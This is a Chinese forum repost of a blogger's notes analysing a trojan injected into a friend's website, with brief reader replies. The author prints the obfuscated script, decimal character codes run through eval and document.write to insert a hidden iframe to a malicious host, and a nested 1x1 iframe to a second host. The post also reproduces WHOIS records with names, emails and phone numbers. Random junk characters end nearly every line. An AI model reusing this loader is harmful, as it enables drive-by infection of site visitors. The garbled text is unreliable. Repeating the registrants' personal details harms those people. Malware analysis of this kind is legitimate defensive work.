[原创]一篇刚写的分析木马手记

首发在我的博客里面， 5)mVy?Z
  
-)X{n?i  
http://www.areway.cn/?p=175 CQ<8P86gt  
ai4PM b$p  
J=):+F=  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： 5lO^;.cS,  
          JfkTw~'R  
<script>t=’60,105,102,114,97,109,101, q'.;W@m  
32,115,114,99,61,104,116,116,112,58,47,47, (]OFS;%  
102,114,101,101,46,117,45,117,117,117,46,99, f7Zf}1|  
110,47,101,114,114,111,114,46,104,116,109, 3)y{n%
3L  
32,119,105,100,116,104,61,49,48,48,32,104, Lj iI+NJ  
101,105,103,104,116,61,48,62,60,47,105,102, .?f:Nb.O  
114,97,109,101,62′; L7m`HVCt&  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> JPLI @zX^  
                                                                                                  7ZQ'h3K  
<script>t=’60,105,102,114,97,109,101,32,115, c -w0  
114,99,61,104,116,116,112,58,47,47,102,114, `0?^[;[u[  
101,101,46,117,45,117,117,117,46,99,110,47, 9<v}LeX  
101,114,114,111,114,46,104,116,109,32,119, sW?B7o?  
105,100,116,104,61,49,48,48,32,104,101,105, 3EmcYC  
103,104,116,61,48,62,60,47,105,102,114,97, or7pJy%4"  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); va^0JfQ  
document.write(t);</script> A';n6ne%i  
                                                                                                  ZY)%U*jWU  
<html xmlns=” Pw= 3PvkL  
http://www.w3.org/1999/xhtml i *B:El1  
“> b{BaQ>.(`  
<head> K}Na3}m  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> rhIGOk1k  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> ]/_G-2.R  
<title>首页 - 爱生活家庭网 ~6kJ~R4  
                                                                                                                                                    %]#VdS|N
  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 A
eaPK  
转换字符串后的大概内容是（谁点击后果自付）： b
_vVB`>  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… P% Q@9kO>  
                                                                                                                                  .liyC~YW  
查询玉米u-uuu.cn的详细信息： *="m3:c'J  
Domain Name: u-uuu.cn 9\>sDSCx  
ROID: 20070901s10001s64972306-cn =5Wp
&SM6  
Domain Status: ok |YRY!V_w  
Registrant Organization: 王雷 2A>C+Y[7\  
Registrant Name: 王雷 y^G>{?Tha  
Administrative Email: czlovexs@126.com o!utZmk$  
Sponsoring Registrar: 北京万网志成科技有限公司 PPj[;(A  
Name Server:ns.yovole.com xZyeX34{M;  
Name Server:ns1.yovole.com /$Z m~Mp  
Registration Date: 2007-09-01 17:54 \6:>
{0\  
Expiration Date: 2008-09-01 17:54 2h<U  
最后PING了一下地址 都没有什么…. y@
`~9$  
                                                                                                b_l3+'#ofM  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. ESIzGaM  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> tOM(U-7Z&  
<script language=”javascript” src=” Px#$uU  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script (f~gEKcB2u  
> |!Fk2Je,  
这个玉米应该有可能是木马作者的： &n|*uLn  
foafau.info的详细信息： -;>#3O-  
Access to INFO WHOIS information is provided to assist persons in [f/.!@sj  
determining the contents of a domain name registration record in the um[!|g/  
Afilias registry database. The data in this record is provided by rrcwtLNbu  
Afilias Limited for informational purposes only, and Afilias does not MRs,l'  
guarantee its accuracy.  This service is intended only for query-based sPy2/7Wqd  
access. You agree that you will use this data only for lawful purposes IA2GUnUhu  
and that, under no circumstances will you use this data to: (a) allow, b=1%pX_  
enable, or otherwise support the transmission by e-mail, telephone, or z,
x"a  
facsimile of mass unsolicited, commercial advertising or solicitations 1ef'7a7e8  
to entities other than the data recipient’s own existing customers; or w;+ br  
(b) enable high volume, automated, electronic processes that send _f3 WRyN0  
queries or data to the systems of Registry Operator, a Registrar, or (Y2mmd  
Afilias except as reasonably necessary to register domain names or _q)!B,y-/N  
modify existing registrations. All rights reserved. Afilias reserves k2p'G')H  
the right to modify these terms at any time. By submitting this query, (a }J$:
 
you agree to abide by this policy. vbp-`M
(  
Domain ID:D22418703-LRMS 0[)VO[  
Domain Name:FOAFAU.INFO PrSkHxm  
Created On:20-Nov-2007 16:05:42 UTC l E^*t`+  
Last Updated On:20-Nov-2007 16:05:44 UTC 5V@&o`!=h  
Expiration Date:20-Nov-2008 16:05:42 UTC s}ADk-7  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) @rwU 1T33  
Status:CLIENT DELETE PROHIBITED xGRT"U(  
Status:CLIENT RENEW PROHIBITED $KX[Zu%  
Status:CLIENT TRANSFER PROHIBITED ~@Kf2dHes  
Status:CLIENT UPDATE PROHIBITED sofu  
Status:TRANSFER PROHIBITED kaQ2
A  
Registrant ID:GODA-040110615 CZ3].DA|z  
Registrant Name:liu hong 9!}q{2j  
Registrant Organization: G52Z)^  
Registrant Street1:beijing `(DJs-xD  
Registrant Street2: MCU9O  
Registrant Street3: s4$X  
Registrant City:beijing /.$L"u  
Registrant State/Province: ^PqMi:htc  
Registrant Postal Code:100000 iCrxV{   
Registrant Country:CN #6W,6(#^#  
Registrant Phone:+86.860108888777 nU/;2=f<  
Registrant Phone Ext.: O!^; mhy"  
Registrant FAX: 0^#DNq*NQ  
Registrant FAX Ext.: p7C!G1+z  
Registrant Email:bbbshiji@163.com >vujZw_0>  
Admin ID:GODA-240110615 jK3\K/ob(  
Admin Name:liu hong /\J|Uj  
Admin Organization: *vnXlV4L  
Admin Street1:beijing xmr|'}Pt[  
Admin Street2: [M:S`{SbY  
Admin Street3: :c7CiP  
Admin City:beijing #3 bv3m  
Admin State/Province: ArzDI{1  
Admin Postal Code:100000 U=cWmH
 
Admin Country:CN QU/3X 1W  
Admin Phone:+86.860108888777 a2yE
:16o6  
Admin Phone Ext.: eN/G i<  
Admin FAX: OVR?*"N_  
Admin FAX Ext.: 1h=D4yN  
Admin Email:bbbshiji@163.com z(H?VfJo  
Billing ID:GODA-340110615 q4ipumy*  
Billing Name:liu hong =yqHC<8:  
Billing Organization: ;S JF%@x  
Billing Street1:beijing vZkXt!%)  
Billing Street2: |nY~ZVTt/  
Billing Street3: [w+Q^\%bN  
Billing City:beijing hNbIpi=  
Billing State/Province: PAZ$_eSK6  
Billing Postal Code:100000 V=}1[^  
Billing Country:CN D.*>;5:0'  
Billing Phone:+86.860108888777 eko]H!Ov(  
Billing Phone Ext.: `4 UlJ4<`  
Billing FAX: !M;A*:-  
Billing FAX Ext.: 6E|S  
Billing Email:bbbshiji@163.com *)>do L  
Tech ID:GODA-140110615 #$'FSy#  
Tech Name:liu hong Wx]d $_  
Tech Organization: ;6m;M63z  
Tech Street1:beijing .Yx_:h=u  
Tech Street2: y3IWfiz>/d  
Tech Street3: wsnK3tM7-  
Tech City:beijing 8h.V4/?  
Tech State/Province: ^%#grX#  
Tech Postal Code:100000 'Kz9ygZy  
Tech Country:CN r]LCvsVa  
Tech Phone:+86.860108888777 %8FN0  
Tech Phone Ext.: C1QV[bJK  
Tech FAX: mhz
Yz;}  
Tech FAX Ext.: 7[K
CWJ  
Tech Email:bbbshiji@163.com CWlW/>yF B  
Name Server:NS27.DOMAINCONTROL.COM o\6iq  
Name Server:NS28.DOMAINCONTROL.COM 'UfeluMd  
Name Server: E5UcZ
7  
Name Server: 'MQ%)hipA  
Name Server: -9o{vmB{  
Name Server: =|SdVv  
Name Server: 4#)6.f~  
Name Server: &ao(!/im  
Name Server: MzTW8  
Name Server: ;>ozEh#8
w  
Name Server: }9&9G%  
Name Server: 8eyl,W=dn  
Name Server: HI!4  
                                                                                                         
OW`STp!  
接着下载每个文件里面的代码： Gv
~p  
一步一步看.. T PYDs+U  
<DZcra  
yA;W/I4  
YV([2  
8_Z/o5s  
g`?:=G:a*  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

看过了就是没看懂。。。

要是有全部 就好了 传上来